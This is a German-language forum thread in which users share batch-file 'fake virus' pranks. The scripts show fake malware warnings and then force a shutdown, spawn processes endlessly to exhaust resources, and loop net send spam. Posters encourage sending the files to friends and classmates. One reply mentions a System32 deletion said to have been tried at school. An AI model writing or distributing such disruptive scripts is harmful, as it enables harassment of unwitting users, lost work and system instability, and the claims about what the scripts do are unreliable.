Jump to content

Fake Virus mit CMD erstellen


4chaos

Recommended Posts

hi

hatte mal langeweile und habe mal nen fake virus erstelt. keine sorge, er löscht nicht alle datein ;)

also wie es geht:

ihr erstellt ein neues textdokumen(kennt ihr ja, rechtsklick->neu->neues textdokument)

darein schreibt ihr das hier:

@echo off

color 2

echo: Spyware and Trojan found

pause

echo:would you delete all the files?

pause

echo:Processing

dir/s

echo:files deleted

pause

shutdown -s -t "1" -c "Deleting Files"

dann geht ihr oben links auf:

datei->speichern unter-> namen eingeben (hier ein beispiel: lol.cmd oder muhaha.cmd oder ka.cmd usw...)

wichtig dabei ist , dass ihr an den namen hinten ein .cmd dranhängt

dann seid ihr schon eigentlich fertig.

wenn ihr das öffnet seht ihr schon alles, danach fährt euer pc runter :P

und danach wieder hochfahren und die datei an lle anderen weiterschicken.

wenn ihr einen spam machen wollt, geht ihr wieder wie oben beschrieben vor und schreibt in die datei:

@echo off

cls

:a

start notepad.exe

goto :a

(an dieses dokument dann lol.bat oder 2stroke.bat usw nennen (an den namen ein .bat dranhängen)

oder das hier:

:hello

start

goto :hello

(hier an den namen der datei ein .cmd dranhängen)

danach verschicken und eure freunde ärgern :D

bis denne

made by 4chaos

Link zu diesem Kommentar
Auf anderen Seiten teilen

Da gibts viiiele Anleitungen im Internet :crazy-smilie:

funzt net, ich hab das jetzt kopiert und eingfügt (genau das was oben ist....)

dann hab ich umbenennt... lol.cmd....aber da machts nur den editor auf und sonst gar nichts....

Link zu diesem Kommentar
Auf anderen Seiten teilen

was lese ich da? *.txt!!!

du musst einen ordner aufmachen, dann auf Extras --> Ordneroptionen --> Ansicht

und dort den Hacken bei "Erweiterungen bei bekannten Dateitypen ausblenden" weg machen!

Und dann die Datei in lol.cmd ändern!

lg erli

bearbeitet von eRLI
Link zu diesem Kommentar
Auf anderen Seiten teilen

ich mach gerade ein referat in der schule über dos/eingabeaufforderung ...

Boah falls bei euch in der Schule net send nicht gesperrt ist:

:a1

net send Computername Text

net send Computername Text

net send Computername Text

goto :a1

so kann man gut andere ärgern gg

Link zu diesem Kommentar
Auf anderen Seiten teilen

ja und was kannst du alles machen, dann schreibe du das doch mal rein ;)

Ich mach ne Lehre als ITler... Sowas lernen wir in der Schule (naja so in der Art) Meister :wub:

Wenn ich euch da ne Kleinigkeit reinschreib was bringts? Da gibts massig Anleitungen im Inet, kann also jeder was größeres reinstellen... Zeigt garnix.

Aber war natürlich nicht nett ausgedrückt, das ist schon ne schöne Basis.

Besser? ;)

Schick mir ne PN wenns trotzdem nicht glaubst, dann kann ich dir mal was schicken wo ich vor ner Zeit gemacht hab (auch so ne Art fake Viruzzz ;))...

bearbeitet von Gileraracer
Link zu diesem Kommentar
Auf anderen Seiten teilen

hi

hatte mal langeweile und habe mal nen fake virus erstelt. keine sorge, er löscht nicht alle datein :(

also wie es geht:

ihr erstellt ein neues textdokumen(kennt ihr ja, rechtsklick->neu->neues textdokument)

darein schreibt ihr das hier:

@echo off

color 2

echo: Spyware and Trojan found

pause

echo:would you delete all the files?

pause

echo:Processing

dir/s

echo:files deleted

pause

shutdown -s -t "1" -c "Deleting Files"

dann geht ihr oben links auf:

datei->speichern unter-> namen eingeben (hier ein beispiel: lol.cmd oder muhaha.cmd oder ka.cmd usw...)

wichtig dabei ist , dass ihr an den namen hinten ein .cmd dranhängt

dann seid ihr schon eigentlich fertig.

wenn ihr das öffnet seht ihr schon alles, danach fährt euer pc runter ;)

und danach wieder hochfahren und die datei an lle anderen weiterschicken.

also passiert bei dem nichts ausser ein neustart des pc's ??

es werden keine datein gelöscht??

so n fake virus hab ich auch fürs handy^^

Link zu diesem Kommentar
Auf anderen Seiten teilen

was passiert da???

mfg

Habs noch ned probiert aber normalerweise müsste damit dein ganzer System32 Ordner gelöscht werden.

Und ja es geht auch wenn der PC hochgefahren ist haben wir in der Schule schon mal probiert.

V.l. probier ichs heute mal bei meinem PC muss sowieso nue aufgesetzt werden.

lg

Link zu diesem Kommentar
Auf anderen Seiten teilen

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung jetzt entfernen

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Lädt...
×
×
  • Neu erstellen...